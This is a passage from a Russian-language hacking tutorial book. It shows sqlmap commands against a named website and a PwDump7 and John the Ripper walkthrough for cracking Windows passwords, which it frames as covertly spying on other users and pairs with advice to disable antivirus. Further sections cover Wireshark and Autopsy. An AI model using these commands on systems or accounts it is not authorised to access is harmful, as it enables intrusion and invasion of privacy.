- 4. Наследственность заведомо уязвимого кода, использование готовых решений с низким уровнем безопасности. Это касается всевозможных плагинов, устанавливаемых в CMS. WordPress, например, довольно защищенная система, чего не скажешь обо всех плагинах для нее. Бывает так, что установка одного плагина с "дырой" сводит на нет все старания по обеспечению безопасности.
- 5. Отсутствие должного уровня абстрагированности исполняемого кода от данных.

В таблице 6.1 приводится описание всех типов SQL-инъекций, которые поддерживает инструмент sqlmap.

Тип инъекции	Описание
Boolean Based Blind SQL Injection	Данный метод подразумевает, что http-запросы и от- веты будут считываться посимвольно для обнаруже- ния уязвимости. Как только уязвимый параметр будет найден, инструмент заменяет или добавляет синтак- сически правильные операторы SQL, ожидая реакции выполнения этого кода сервером. SQLMap сравнивает оригинальный валидный запрос с ответом от запроса с внедренным зловредным кодом. SQLMap использует алгоритм деления пополам (bisectional algorithm) для выборки каждого симво- ла ответа с использованием максимум семи HTTP- запросов
Time-Based Blind SQL Injection	Предполагает, что существует некоторое сравнение на основе времени запроса и ответа путем инъекции син- таксически правильного оператора SQL в уязвимый параметр. SQLMap использует операторы SQL, кото- рые помещают базу данных в режим ожидания для возврата на определенное количество времени

Таблица 6.1. Типы SQL-инъекций

Error-Based SQL Injection	Инструмент использует SQL-операторы, которые мо- гут спровоцировать генерацию специфической ошиб- ки. Утилита ищет ошибки в HTTP-ответе сервера. Метод сработает только в случае, если приложение настроено на раскрытие сообщений об ошибках
UNION Query	Вводится оператор UNION ALL SELECT. Инъекция, основанная на запросах UNION, работает на основе поведения приложения, т.е. когда приложение пере- дает результат письменного запроса SELECT через определенный цикл или строку инструкций, которые позволяют выводить выходные данные на содержимое страницы. Если вывод не циклируется через какой-ли- бо цикл for или другую строку операторов, SQLMap использует однократную инъекцию запроса UNION
Stacked Query	Метод подразумевает использование сложенных (не вложенных, а именно сложенных!) запросов. SQLMap добавляет точку с запятой (;) в значение уязвимого па- раметра и добавляет инструкцию SQL, которая долж- на быть выполнена.
	Используя эту технику, можно выполнять SQL- выражения, отличные от SELECT. Это полезно для манипуляции данными, получения доступа на чтение и запись и, наконец, захвата операционной системой
Out-Of-Band	В этом методе используется вторичный или другой канал связи для вывода результатов запросов, запу- щенных в уязвимом приложении. Например, вставка выполняется в веб-приложение, а вторичный канал, такой как DNS-запросы, используется для пересылки данных обратно на домен злоумышленника

С помощью sqlmap можно проверять, имеется ли в сайтах уязвимость.

Если сайт уязвим к SQL-инъекции, то становится возможным:

• Получать информацию из базы данных, в том числе дамп (всю) базу данных;

-----

- Изменять и удалять информацию из базы данных;
- Заливать шелл (бэкдор) на веб-сервер.

Один из сценариев использования sqlmap:

- Получение имени пользователя и пароля из базы данных;
- Поиск панелей администрирования сайта (админок);
- Вход в админку с полученным логином и паролем.

При наличии уязвимости атака может развиваться по различным направлениям:

- Модификация данных;
- Заливка бэкдора;
- Внедрение JavaScript кода для получения данных пользователей;
- Внедрение кода для подцепления на BeEF.

Как мы можем убедиться, SQL-инъекция – очень опасная уязвимость, которая дает хакеру большие возможности.

Найти инъекцию довольно просто, если она, конечно, есть. Представим, что у нас есть следующий адрес сайта http://www.dwib.org/faq2.php?id=4 (можешь спокойно тренироваться на этом сайте, тебе ничего за это не будет!). В данном случае сценарию faq2.php передается параметр id со значением 4. Попробуем проверить, можем ли мы что-то сделать с этим сайтом:

sqlmap -u http://www.dwib.org/faq2.php?id=4

В процессе проверки **sqlmap** может задавать различные вопросы, и на них нужно отвечать y (т.е. "да") или n (т.е. "нет"). Буквы y и n могут быть заглавными или маленькими. Заглавная буква означает выбор по умолчанию, если вы с ним согласны, то просто нажмите **Enter**.

Посмотрим вывод sqlmap (рис. 6.36). В данном случае sqlmap не нашел уязвимости, честно написав в отчете:

GET parameter 'id' does not seem to be injectable

Также программа сообщает, что можно выполнить дополнительные тесты, указав опцию --*risk*. Делается это так:

sqlmap \_\_risk 3 \_u http://www.dwib.org/faq2.php?id=4

Puc. 6.36. Отчет sqlmap

Данная опция может принимать целые значения от 1 до 3, 3 – наивысшая степень риска. Если и с этой опцией ничего не получится, значит, этот параметр неуязвим и нужно найти какой-то другой параметр.

Полное описание работы этого инструмента выходит за рамки этой книги, но мы не оставим тебя без напутствий:

https://medium.com/@haeniken/sql-inj-sqlmap-rus-flc4d7fb1e68

https://xakep.ru/2011/12/06/57950/

Этих двух ссылок вполне будет достаточно для освоения данного инструмента.

## 6.4.10. Взлом пароля Windows. John the Ripper

Настало время взломать пароли Windows. Представим, что у тебя есть доступ к компу, но тебе нужно узнать пароли других пользователей. По умолчанию они зашифрованы, но тебе очень хочется их узнать без сбро-

са – чтобы можно было войти в учетную запись пользователя и посмотреть, какие сайты он посещает, с какими документами и программами работает. Можно, конечно, сбросить пароль, но тогда пользователь узнает о взломе его аккаунта и, конечно же, заподозрит тебя.

Взлом пароля состоит из двух этапов – получение хеша пароля и расшифровка хеша. Для реализации первого этапа нужно использовать программу PwDump7, скачать которую можно совершенно бесплатно по одному из адресов:

http://www.tarasco.org/security/pwdump\_7/index.html https://www.securitylab.ru/software/423908.php

Первая ссылка – это сайт разработчика, вторая – архив с программой, если первый адрес перестанет открываться.

Внимание! Некоторые антивирусы очень ретиво реагируют на данную программу и называют ее вирусом. Поэтому перед загрузкой архива с программой антивирус нужно выключить.

Распакуй архив с программой, скажем, в каталог с:\tmp. Затем открой командную строку с правами администратора (найди в меню команду Командная строка, щелкни на ней правой кнопкой мыши и выбери команду Запуск от имени администратора). Введи команду:

```
cd c:\tmp 
pwdump7 > hash.txt
```

c:\tmp\p4dump7>P4Dump7.exe > hash.txt Pwdump v7.1 - гам password extractor Author: Andres Tarasco Acuna url: http://www.514.es c:\tmp\pwdump7>dir Том-в'устройстве С не имеет метки. .Серийный номер тома: CADF-EAE0	
Содержимое папки с:\tmp\pwdump?	
08.12.2020 12:49 <dir> 08.12.2020 12:49 <dir> 08.12.2020 12:49 <dir> 08.12.2020 12:49 337 hash.txt 15.11.2009 13:37 1a017a344 libeay32.dll 01.07.2007 01:35 77a824 PwDump7 exe 10.03.2010 19:20 522 readme.txt 4 Файлов 1a096a027 байт 2 папок 41a232a867a328 байт свободно c:\tmp\pwdump7&gt;</dir></dir></dir>	
Рис. 6.37. Экспорт хешей паролей	

Этим вы экспортируете хеши паролей в файл hash.txt. Если открыть этот файл, то его содержимое будет примерно таким:

AE931B73C59D7E0C089C0::: \*\*\*\*\*\*\*\*\*\*\*\*\*NO >ABL:501:NO PASSWORD\*\*\*\*\*\* PASSWORD\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* 111:1001:NO PASSWORD\*\*\*\*\*\* 4BEB12283678::: 496D62BA2A4B32572104F16:::

Конкретное содержимое зависит от твоего компа. Теперь этот файл нужно скормить инструменту John the Ripper. Введи команду:

john hash.txt

Самое интересное, для паролей Windows желательно использовать опции -format=LM или -format=NT. Но при использовании этих опций инструмент не справился с задачей, а вот без этих опций у него все получилось. На рис. 6.38 видно, что есть пользователь с именем 111 и паролем 123. Также есть пользователь с непонятным именем, скорее всего, это PwDump7 не справился с русскоязычным именем пользователя. У этого пользователя с непонятным именем вообще нет пароля.



Не беспокойся, если твои пользователи используют русскоязычные пароли – они будут правильно расшифрованы. Просто **john** нормально поддерживает UTF-8 и она работает с хешем пароля, а хеш содержит только английские символы, и программа PwDump7 не сможет накосячить с кодировкой хеша.

Если пользователей много, возможно, придется подбирать пароли – пробовать по порядку, пока не войдешь в систему. Зато ты будешь знать пароли всех пользователей!

## 6.4.11. Wireshark – захват трафика

Wireshark — это анализатор сетевых пакетов. Анализатор сетевых пакетов, который захватывает сетевые пакеты и пытается как можно подробнее отобразить данные пакета.

Если тебе интересно, что происходит в твоей сети, так сказать, под микроскопом, то эта программа для тебя.

Программа подойдет не только для хакеров, но еще и для сетевых админов, которые могут использовать его для устранения неполадок в сети, и для студентов, которые хотят изучить строение сетевых протоколов.

Использовать его можно так:



Здесь нас интересуют только пакеты протокола TCP с портом 80, передаваемые по интерфейсу eth0. То есть мы будем захватывать только трафик с сетевой карты.

Существует и версия с графическим интерфейсом, которая более удобна в использовании. При запуске нужно выбрать интерфейс, который нужно прослушивать (рис. 6.40), а затем ты увидишь все захваченные пакеты, проходящие через этот интерфейс.







Рис. 6.40. Выбор сетевого интерфейса



3	🖸 🕴 Lenta.ru - Новости 🖆 root@kali:	🧟 Захват из eth0 👒	🔹 skiptish - Файловый 01:39 ПП (РМ) 🖸 🧃	A 0 A G
		нэ eth0		
Файл Редактирование П	Тросмотр Запуск Захват Анализ С	ефония Беспроводной Инс	трументы Помощь	
	🛚 🔯 🗟 Q + + Q + + 📰 🛛			
П Применить дисплейный ф				<b>E3</b> •] •
No. Time	Source Destination	Protocol Length Info		
382 29.578130881	172.217.20.2 192.168.84.136	TLSV1.2 93 Application 1	Data	ANAL PROPERTY AND
383 29.578150483	192.168.84.136 172.217.20.2	TCP 54 51268 - 443	[ACK] Seq=40 Ack=40 Win=62780 Len=0	
384 30.542795095	192.168.84.136 88.198.239.118	TLSv1.2 100 Application	Data	Self- Contraction
385 30.543253814	88.198.239.118 192.168.84.136	TCP 60 443 - 44108	[ACK] Seq=1 Ack=47 Win=64240 Len=0	
386 30.597899751	88.198.239.118 192.168.84.136	TLSv1.2 100 Application	Data	Service States
387 30.597919826	192.168.84.136 88.198.239.118	TCP 54 44108 - 443	[ACK] Seq=47 Ack=47 Win=62780 Len=0	FILMENDED I
Frame 283: 60 bytes o Ethernet II, Src: VMv Internet Protocol Ver Transmission Control	on wire (480 bits), 60 bytes captured (486 ware eb.74:20 (00:00:56:eb:74:20), Dst: VM rsion 4, Src: 216.58 209.3, Dst: 192160 & Protocol, Src Port: 80, Dst Port: 46866,	bits) on interface eth0, i ware_43:ba:3f (00:0c:29:43: 4,136 Seq: 1, Ack: 2, Len: 0	d O ba:sf)	
00 0c 29 43 ba 3	if 00 50 56 eb 74 20 08 00 45 00 )C ?			
00 28 ff ef 00 0	00 80 06 7c 71 d8 3a d1 03 c0 a8 (			
54 88 00 50 07 1 fs fp 57 sf pp 0	12 43 c4 19 dc ec 40 90 70 58 10 T P C	4) A 4		
	9 00 00 00 00 00 a			
the etho: <live capture="" in<="" td=""><td>progress&gt;</td><td></td><td>Пакеты: 387 - Показаны: 387 (100.0%)</td><td>Профиль: Default</td></live>	progress>		Пакеты: 387 - Показаны: 387 (100.0%)	Профиль: Default

Рис. 6.41. Захват трафика

В Интернете множество инструкций по правильному использованию wireshark, а на Youtube можно найти даже видеоуроки, например,

https://www.youtube.com/watch?v=qvj7Uzj8QPY

# 6.4.12. Autopsy Forensic Browser: профессиональный инструмент правоохранительных органов

**Autopsy** является цифровым инструментом судебной экспертизы для расследования того, что произошло на твоем компьютере. В мирных целях его тоже можно использовать, например, для восстановления изображений с SD-карты.

Данный инструмент используется сотрудниками правоохранительных органов. Так что ты просто обязан с ним ознакомиться – если ты попадешься на чем-то незаконном, то с большей долей вероятностью против тебя будут . использовать этот инструмент. Правда, есть еще другой инструмент – паяльник, но будем надеяться, что он остался в прошлом!

Autopsy был создан самодостаточным инструментом с модулями, которые поставляются из коробки и доступны из сторонних источников.

Autopsy имеет расширяемую инфраструктуру отчетности, которая позволяет создавать исследователям дополнительные типы отчетов. Пол умолчанию доступны отчеты в файлах HTML, XLS и Body. Каждый настраивается в зависимости от информации, которую нужно включить в отчет:

- НТМL и Excel НТМL- и Excel-отчеты предназначены для полностью упакованных и разделенных отчетов. Они могут включать ссылки на файлы с тегами, а также вставленные комментарии и пометки исследователей, а также другие автоматические поиски, которые выполняет Autopsy во время анализа. Сюда относятся закладки, веб-история, недавние документы, встреченные ключевые слова, встреченные совпадения с хешами, установленные программы, подключенные устройства, cookies, загрузки и поисковые запросы.
- Файл Body в основном для использования с анализом активности по времени, этот файл будет включать временные метки MAC (последняя модификация или запись, доступ или изменение) для каждого файла в формате XML для импорта внешними инструментами, такими как mactime в Sleuth Kit.

Следователи могут сгенерировать более чем один отчет за раз, а также редактировать существующие или создавать новые модули для настройки поведения под их специфичные потребности.

Возможности autopsy:

- Многопользовательские кейсы работать над исследованием системы можно сообща, Autopsy поддерживает такую возможность.
- Анализ активности по времени показ системных событий в графическом интерфейсе для помощи в идентификации активности.
- Поиск по ключевым словам извлечение текста и модули индексного поиска дают вам возможность найти файлы, в которых упоминаются специфические термины, и осуществлять поиск по паттернам регулярных выражений.
- Веб-артефакты извлечение веб-активности из популярных браузеров для помощи в идентификации пользовательской активности.
- Анализ реестра используется RegRipper для идентификации доступа к последним документам и USB-устройствам.
- Анализ файлов LNK определяет ярлыки и открытые документы.

158

- Анализ электронной почты разбор сообщений в формате MBOX, таким как Thunderbird.
- EXIF извлекает информацию о геолокации и камере из файлов JPEG.
- Сортировка по типам файлов группировка файлов по их типу для поиска всех изображений или документов.
- Воспроизведение медиа просмотр видео и изображений в приложении, внешний просмотрщик не требуется.
- Просмотр миниатюр отображает миниатюры изображений для помощи в быстром обзоре картинок.
- Надежный анализ файловой системы поддержка популярных файловых систем, включая NTFS, FAT12/FAT16/FAT32/ExFAT, HFS+, ISO9660 (CD-ROM), Ext2/Ext3/Ext4, Yaffs2 и UFS из The Sleuth Kit.
- Фильтрация файлов по хешам отфильтровывание хорошо известных файлов с использованием NSRL и пометка плохих файлов с помощью пользовательских наборов хешей в форматах HashKeeper, md5sum и EnCase.
- Теги помечайте файлы тегами, с произвольными именами тегов, такими как "закладки", "подозрительные", и добавляйте комментарии.
- Извлечение строк Unicode извлекай строки из не распределенных областей и неизвестных типов файлов на многих языках (арабском, китайском, японском и т. д.).
- Определение типа файла на основе сигнатур и выявление несоответствия расширения файла его содержимому.
- Модуль интересных файлов пометит файлы и папки, основываясь на имени и пути.
- Поддержка Android извлечение данных из SMS, журнала звонков, контактов, Tango, Words with Friends и других.

Весь этот функционал достигается посредством использования того или иного модуля программы. Далее, в таблице 6.2, будет приведен список модулей с пояснением функционала каждого из них.

Нужно отметить, что разработка версии для Linux приостановлена (на данный момент текущей является версия 2.XX), а вот разработка Windowsверсии Autopsy идет полным ходом (доступна версия 4). С одной стороны, данный инструмент стал известным благодаря Kali Linux, поэтому мы не можем не упомянуть, как запустить Autopsy в нем. Для этого нужно ввести команду:

sudo autopsy

После этого нужно открыть браузер и ввести адрес:

http://localhost:9999/autopsy



Рис. 6.42. Программа запущена



Рис. 6.43. Анторуу 2 для Linux

С другой стороны, версия для Windows значительно ушла вперед и правильно использовать именно ее. Скачай версию для Windows по адресу:

https://www.autopsy.com/download/

Установи ее как обычное приложение. Далее алгоритм будет таким:

- 1. На "вход" программе нужно подать или локальный компьютер, то есть установить программу на исследуемом компьютере, или же образ жесткого диска компьютера.
- 2. Программа понимает образы дисков VDI (используются в Hyper-V). Если у тебя виртуальная машина сохраняет образы в другом формате, например в VMDK (VMWare), сначала нужно преобразовать образ в формат RAW, а затем "скормить" программе. Для этого можно использовать команду (разумеется, сначала нужно установить qemu-img): *qemu-img convert vmdk original.vmdk -m 16 -p -O raw converted.raw*.
- 3. Если нужно проанализировать физический компьютер, то можно использовать любой инструмент, позволяющий создать физический образ диска, например https://www.ubackup.com/clone/hard-disk-raw-copy-4348. html. Если ситуация позволяет, можно установить Autopsy прямо на физический компьютер и работать с ним, не создавая образ диска. Однако ты должен понимать, что на компьютере происходят какие-то процессы и иногда правильнее снять образ диска, чтобы зафиксировать его во времени. Хорошая идея отключить анализируемый компьютер от сети (от локальной и от Интернета), если нет возможности сделать образ диска.

Далее будет показано, как работать с программой на локальном компьютере. Запусти программу и выберите New case – новое дело (рис. 6.44).



Рис. 6.44. Программа Autopsy для Windows

Введи название дела и выбери режим – однопользовательский (Single-user) или многопользовательский (Multi-user). На следующей странице заполни необязательную информацию и нажми кнопку Finish.

5	Case Informatio	m	100 C
Case Information Optional Information	Case Name:	Test	Contraction of the local distance
· · · · · · · · · · · · · · · · · · ·	Base Directory:		Brows
	Case Type:	Single-user     Multi-user	
	Case data will be	stored in the following directory:	
	\Test		T SALAN A
	Ser Contraction		
	Car And		
States 10	A MARTINE		
Sec. 3			
the the			

Рис. 6.45. Создание нового дела

Появится окно с выбором источника данных. Если нужно исследовать образ диска, выбери первый вариант, нас же сейчас интересует исследование локального диска, поэтому выбери второй вариант (Local Disk). Нажми кнопку **Next**.

На следующей странице будет возможность выбора исследуемого диска. Если не все диски отображаются в списке, закрой программу и запусти ее с правами администратора (рис. 6.47). Опция **Make a VHD image of the drive** while it is being analyzed (на рис. 6.46 он спрятан за окном выбора диска, но он там есть!) позволяет создать образ диска перед началом его анализа. Это на случай, если есть подозрения, что данные могут измениться в процессе анализа.

Правильнее, конечно, сделать образ диска, если на компьютере хватает места или есть внешний носитель, куда ты разместишь образ диска. Ведь его размер будет равен размеру используемого пространства.

Например, если есть диск размером 500 Гб, но занято всего 120 Гб, то размер образа будет равен 120 Гб.

teps	Select Typ	e of Data Source To Add	
Select Type of Data Source To Add Select Data Source Configure Ingest Modules Add Data Source		Dek Image or VM File	
10		Local Disk	
	-	Logical Piles	
		Unallocated Space Image File	
		Autopsy Logical Imager Results	
		XRY Text Export	
- / S			
Cont 1			

Рис. 6.46. Выбор источника данных

Add Data Sturre 🙀 Inap	es/Adead 🔛 Communications 💡 Geolecation	a 🛗 Tradine 🛃 Discourry 🚡 Generate Report 💣 Close Case
	Aud Data Source	x
	Steps	Solect Data Secret
	L. Select Typic of Data Source To	Local Date: Unspecified
	2. Select Data Source 3. Configure Ingent Hodaies	Tensore (DPT s200) Bruchfleace w
	· AD JES HAVE	
	Select L	Local Disk X
	Select all	teol det
	Sector Sector	
		State Louis
	100 - 100	
	and the second	And the second
	and the second s	
	See States	Course of Management and and the Course of Cou
	ters here the set	CANALI STRATO CONTRACT CANALI STRATE

Рис. 6.47. Выбор локального диска

Нажатие кнопки Next приводит к выбору модулей программы. Включение того или иного модуля добавляет нужный функционал. Для самого полного анализа выбери все модули, но этим ты замедлишь процесс. Описание модулей приведено в таблице 6.2.

Название модуля	Назначение
Recent Activity Module	Модуль позволяет извлечь активность пользовате- ля, веб запросы, загрузки, закладки браузера, файлы cookie и тд. Анализирует реестр – установленные и за- пускаемые программы, данные об подключенных USB- устройствах, извлекает данные из корзины.
Hash Lookup	Вычисляет хеш-значения MD5 для файла, а потом ищет их в базе данных, чтобы определить, является ли файл известным. Для его работы необходимо добавить базу хэшей. Поддерживается огромная база NIST NSRL, которая содержит хеши известных файлов Windows/ PC,Android, iOS. Отметим, что использование NIST NSRL ускоряет исследования, поскольку можно игно- рировать известные файлы
File Type Identification	Определяет файлы на основе их внутренних подписей и не полагается на расширение файлов. Autopsy исполь- зует библиотеку Tika (обнаруживает и извлекает мета- данные и текст из более чем тысячи различных типов файлов). Может быть гибко настроен пользовательски- ми правилами
Embedded File Extraction	Модуль открывает ZIP, RAR, другие форматы архивов, Doc, Docx, PPT, PPTX, XLS и XLSX и отправляет извле- ченные файлы из этих архивов для анализа. В случае за- шифрованных архивов, при наличии пароля, позволяет расшифровать эти архивы
EXIF Parser	Извлекает информацию EXIF (служебную информа- цию) из полученных изображений. Позволяет опреде- лить географические координаты места, где был сделан снимок, время, когда был сделан снимок, типа (модель) камеры, используемой для съемки изображения, и ее не- которые настройки

Extension Mismatch	Используется для поиска несоответствий расширений. Этот модуль может выдавать множество ложных сраба- тываний, т.к. например многие файлы переименовыва- ются в ".tmp." или "bak".
	Можно уменьшить количество ложных срабатываний, сосредоточившись на типах файлов. По умолчанию ис- пользуются только мультимедиа и исполняемые файлы.
Keyword Search Module	Напоминает поиск по ключевым словам в DLP систе- мах. Извлекает текст из поддерживаемых форматов файлов, таких как текстовый формат txt, документы MS Office, PDF-файлы, электронная почта и многие другие. Существует также параметр для включения оптиче- ского распознавания символов (OCR). С его помощью текст может быть извлечен из поддерживаемых типов изображений. При включении этой функции поиск займет больше времени и результаты не являются со- вершенными
Email Parser Module	Модуль идентифицирует файлы формата MBOX, EML и PST на основе подписей файлов. Добавляет вложения в качестве дочерних элементов сообщений, группирует сообщения в потоки
Encryption detection module	Помечает файлы и тома, которые являются зашифрова- ными или могут быть такими. Модуль ищет следующие типы шифрования: 1) Любой файл, который имеет энтропию, равную или превышающую порог в настройках модуля 2) Защищенные паролем файлы Office, PDF-файлы и базы данных Access 3) Разделы BitLocker 4) SQLCipher 5) VeraCrypt
Interesting Files	Модуль поиска файлов и каталогов, которые соответ- ствуют набору заданных правил (например, имя+тип файла+размер). Это может быть полезно, если всегда нужно проверить, находятся ли файлы с данным име- нем в источнике данных, или если тебе интересны фай- лы определенного типа

Virtual Machine Extractor	Анализирует виртуальные машины, найденные в источ- нике данных. Обнаруживает файлы vmdk и vhd и делает локальную копию их, не требует конфигурации
Plaso Module	Использует инструмент Placo с открытым исходным ко- дом для анализа различных журналов и типов файлов для извлечения временных меток, визуализирует дан- ные в виде гистограммы
Android Analyzer	Позволяет анализировать SQLite и другие файлы с устройства Android. Модуль должен быть способен из- влекать следующие данные: текстовые сообщения (SMS / MMS), журнал вызовов, контакты, GPS из браузера и Google MapsGPS из кэша



Рис 6.48. Выбор типа модулей

Нажми кнопку Next – отобразится процесс добавления источника. Этот процесс может быть довольно длительным, все зависит от размера добавляемых данных (рис. 6.49). В общем, можно пойти выпить чашку кофе и в некоторых случаях – не одну. Далее вы получите сообщение о том, что файлы добавлены и проанализированы. Несмотря на то, что откроется основное окно программы, модули программы все еще работают – анализируют файлы. О ходе процесса информирует индикатор в нижнем правом углу окна программы.

Add Data Source	1	×
Steps	Add Data Source	parties.
Select Type of Data Source To Add     Select Data Source     Configure Ingent Modules     Add Data Source	Processing data source and adding it to a local database. File analysis will start when this finishes.	
5	Status Adding: Users/Hacker/AppData/Local/Packages/Mcrosoft.MSPaint_Bindsyb3d88bine/AC	
	"This process may take some time for large data sources.	
21		
	sign and sector Cond	] . tele



· · · · · · · · · · · · · · · · · · ·	0	Listing					C Prepareta	
P III Setable cov	NUMBER OF STREET	Table Thumbnal Comme	7				and the second	18
Sens		THE CONTRACT						Save Table as C
G & By Extension B & By MIME Type		Rane	Type	Size (Bytes)	Sector Size (Bytes)	Timesone	Device ID	No. Constant
Y Deleted Fles		A PhysicalOrived	10-027	644245/9140	512	furgeitform	10160587-5897-4532-9797-3an43541118	
Resulta		1.5. 1.1					A. 9-26-20-20-20-20-20-20-20-20-20-20-20-20-20-	
Extracted Content  Web Bookmarks (12)		States and						
web Cookies (20)								
Web Form Autofit (1)		Were the						15 20
Keyword Hits		1. 1. 1				1.		
Single Literal Keyword Search (0)	199	1.1.1.1.1.1.1	Arch					
A HashaetHts		1. 22.3						
· E Finil Hessages · · · · Interesting Items		1.1.22						
Accounts		1.4						
Reports		1					1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1	
and the second second		1. 1. 1. 1.						
		1. 1. 1. 1. 1.						
		-	in the		1.			medicante indication
		Ferry That Application P	ic leated to back	H Jaufa Annado	e bit at Clean (andia)			
			Se in the Carlo			option and and and and and and and and and an		
		The start						
		1.2-0.20						
		1.		10.2	100.			1000

Рис. 6.50. Источник данных анализируется

По мере анализа в дерево слева будут добавляться новые узлы. Сделано это так намеренно: чтобы, пока работают другие модули, ты уже мог работать с данными, которые предоставили отработавшие модули.

После отработки модулей видим следующую картину: слева дерево подкаталогов – справа детальное отражение. Теперь можем приступать к анализу содержимого. Например, в ветке Exracted Content и блоке Operation System Information видим данные домена, имя хоста, версии ОС и т.д.



Рис. 6.51. Имя компьютера и операционная система

Блок **Recent Documents** содержит список недавних документов, с которыми работал пользователь, – наверняка это и есть самые актуальные данные на этом компьютере (рис. 6.52). Среди последних документов может вызвать интерес файл с именем пароли.txt. Загляни, в нем точно будет что-то полезное. Недалекий пользователь хранил пароли в текстовом файле!

Statistic states and	scators ¥ 0	estocation the Tendine dia Decovers a	Generate Report	Cone Cane 2	• Keyword Lats	Or Keyword Search
e a:	0	Listing	10-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-			4.5.42
Data Sources	The other states	Table Thumboal Common				78 Resu
C S He Types		THE PROPERTY AND ADDRESS				Anna Table on City
		and the second second second	Contraction of the		inge victory and	The same same as care
A & BUNDAL TUDE		Source File	s c o	Feth	Cate/Nme	Data Source
El-y Deleted Pies		# IIILbe		< Kreenstraders/Decuments(111).edt	2029-12406 00:93625	MSK . HysicalDiver
(i) MB Me San		d Fles.rk		Critices classonant/heartopl/AEPSCAL_C_DECPYPTER/Ples	2020-12-05 00:15:05	PER Physical Private
Realts		🔮 uindewsdefenderJrik		Niu proteered path found	2020-12-00 12:40:02	MK Physicalinive
CO Materiala (1990)		2 Berpysoulik		Cilaber: Heckey Bowelands	2520-12-02 15:04:29	HK Physicalinver
- Itili Operating System Information (2)		B rbereprer, itk		the preferred reth found	2120-12-08 12:40.00	NSK Physical Lover
Operating System User Account (1)		😤 napozelirk		Cristeen/Hecker/Desitep/ADFSDF_C_DECRIFTED/Hest/uffer&setto+1.tot	2020-12-07-09-15-06	NSK Physical Enver
- 8 Report Doursents (79)		₫ Files.Irk		Cittles	2020-12-05 08:07 27	PER Physical Price
C Recycle Bin (12)		🔅 Windows 10 (C) (2) Jak		4	2020-12-05.00.00-50	MSK PhysicsErlyth
f Sel San (167)		🖉 Windows 10 (C).kk			2020-12-05 (@-%-55	MSK FlyskaDrive
- EN LISE Device Attached (10)		# Hoese nariva.ink		c.shdtoos = a Will hdtel a Witelt a	2220-12-05-00:08:05	HSF HyskaDrive
Web Bookmarks (12)		# naposultk		< When it is the state of the s	2020-12-05 00:07127	HSR PhysicalDriver
Web Cookies (102)		If frame 23.UK		C waardisser@econsents@idfe3+9 ~ 4 200affe0+# ~ t Dader	2002-06-20 09:20:36	How thustolity and
Web Downloads (8)		R Frana 24UNK		Cikineviljamiljoumenteljeffe3+e "s 24suffe3+a "e 24.ater	8029-06-13 19/27/26	Hik Physicalitevet
- By the Point Addres (U)		E Frans 25.LNK		Cisherstheritoumenallydra+a ~*+ 2020Hid+a **a 25.der	2120-06-29-09-21-08	NIK PhysicalTown
web Search (1)		R France 26.LNK		Ciphenijkenijkaumentaljullitä+a."4 zhijullitä+a "a 26.der	2/20/06-20 09:21:58	NSK Physical Rover
101-9. Keyword Hits		R Tanko 6.UK		Ciptures/User/Documents/haffe3+# T# 6/hate9+9 T# 6.vls	2020-06-20 09-23 53	MSA Phytomal asvet
😥 🔍 Single Literal Keyword Search (0)		Patorasi cran.UK		Crititeers/User/Desistop	2020-06-20 06:52 14	MSA Myskalletver
🕀 🔍 Single Regular Expression Searchi (0)		Practice Files. Vik		C/(Josenikaan/Omikaan)/750735669339, Next9760735669130, Hes/Ch439Practio	19es 2020-08-08 16:07 14	HEL Henksbrive
Senai Addresses (6)		<	1953 R. S. 10 17 18	The second s	in the second	2 2 2 2
-SP E-Mail Messages		Land, and the second second			11-11-11-11-1	
- XK. Interesting litens		Her Lett Appliates Werturara's t	water Bearling Acessian	an the Carena		1015 Starte
Accounts			part and the state of the state		the stage way to be provided and the state of the	
Bill Tags						
) Reports						
		the state of the state				
		1				
		and a strategy and				
		and the second second				
and the second se	- Anna An	La contraction of the second	and the second second			
				Recent Activity for PhysiceDriveO		Contraction of the second second

Рис. 6.52. Список недавних документов

Блок **Deleted Files** позволяет просматривать удаленные файлы (рис. 6.53). Обрати внимание: это не корзина. Файлы в корзине находятся в ветке **Recycle Bin**, а удаленные файлы – в **Deleted Files**. Количество удаленных файлов может быть довольно большим. Попытайся их удалить. С жестким диском у тебя должно все получиться, с SSD – далеко не всегда. Если в качестве источника данных указать флешку, можно попытаться восстановить файлы с нее.

👾 Add Data Source 🜆 Jeoges/Valeos 🐻 Consumcators	Genocation Theline 🔬 Dicovery 🛓 Generate Report 💣 Clear Case 10	12 10 10	CONTRACTOR	word Lans Qy Mayor	and Swarch
(+ (a)	O Littre	and the second		1 Contractor	1.175
- Cota Sources	Fig System Table Weinland				6822 Reputs
C-@ Vend				The second	and succession
前前 No File Types				Service and Service	MIN IN CA
10 - C By Extension	Name S C O Modified Time	Change Time	Access Time	Created Title	See Ru
Co. u Delated Files	y VortexScheniaRequests.dat * 1000-70-00-0000	00,002,00-00-00,000,00	0107-00-00.00-00-00	1000-00-00-00-00-00	0 A
g Plie System (5872)	X \$06_Connections merced	00 00 00 00 00 00 00 00 00	10000 UN US (01/01/01/01	1000-00-00-00-00-00-00-0	FILL R. MA
3. Al (8822)	y 112_Convects Properties pop-as or a con	eta indepitasian aslanitat	0000-00-00-00-00-00	12200 00 (0100 (0100)	- e
(i) MD Hie Stee	a 127_Correct View File in Directory polo-co-co-co-co-co-co-co-co-co-co-co-co-co	00 . 0001-004010.00.00	0001-01-01101-00-00	(0)0-00-00-00-00-07	. 0
Com Results	x 131_Connects X0+0+000H0	10:0-0-0-0-0-0-0	00(0-0-0-0-0.0)	0-0-01010-0-0	19.
-17 Hetadata (343)	s 11_Dehav_P	0/	00.601010100100100	(dr/dr/dr/dr/dr/dr/dr/dr/dr/dr/	.0.
- eligi Operating System Information (2)	W 15_Celular P Open in External Viewer Ctri+E provosito to to	000-00-00-00-00-00	100.0-00-00-00-00-000	0000-00-00 00.00-00-0	4 2
- Itig Operating System User Account (1)	y 366 Correct View File in Temetine. Stool as at midt	00100-00-00-00-00-00-00-00-00-00-00-00-0	0000-00-00-00-00-00	0000-00-00-00-00-00	1. 0.
(#) Recent Documents (78)	1 123_Ophiles   Detroit Elland	an anan an an rana ha	0/00+01-01/00+00+0	10000-00-00-00-00-00	3 6
/\$ Recycle Bin (12)	w 17_Convector (CO-01-010)-00	00-00-00-00-00-00-00	0706-06-00 (010) 01	0101-001010-00-0	15.3.5
R Sel Back (552)	y 194 Cannecti Export selected rows to CSV	0-0-0-0-0-0-0-0	-010-0-01010-0	10.0 (0.0 (0.0) 0.0)	0.10
